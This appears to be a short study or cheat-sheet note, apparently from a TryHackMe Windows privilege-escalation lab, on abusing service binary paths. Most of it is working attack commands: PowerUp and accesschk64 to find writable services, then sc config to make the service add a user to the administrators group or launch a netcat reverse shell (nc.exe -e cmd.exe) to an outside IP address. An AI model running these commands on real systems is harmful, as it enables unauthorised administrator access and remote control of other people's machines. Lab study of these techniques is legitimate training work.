# Binary Paths ## Overview Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the **binary path** (executable file) to a malicious one. ## Exploitation using PowerUp #### Run PowerUp on machine ```powerquery . .\PowerUp.ps1 Invoke-AllChecks ```

TCM Windows Priv Esc on Try Hack Me

#### Change the binary path ```powerquery sc config daclsvc binpath= "net localgroup administrators Greg /add" sc config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337" ``` #### Start service ```powerquery sc start dacl ``` ## Exploitation via Accesschk64 #### Check for services with write permissions ``` accesschk64.exe --accept-eula -uwcv Everyone * ```

TCM Windows Priv Esc on Try Hack Me

``` accesschk64.exe -uwcv daclsvc ```

TCM Windows Priv Esc on Try Hack Me

#### Query the service ```powerquery sc qc daclsvc ```

TCM Windows Priv Esc on Try Hack Me

#### Changing the binary path is the same as the last method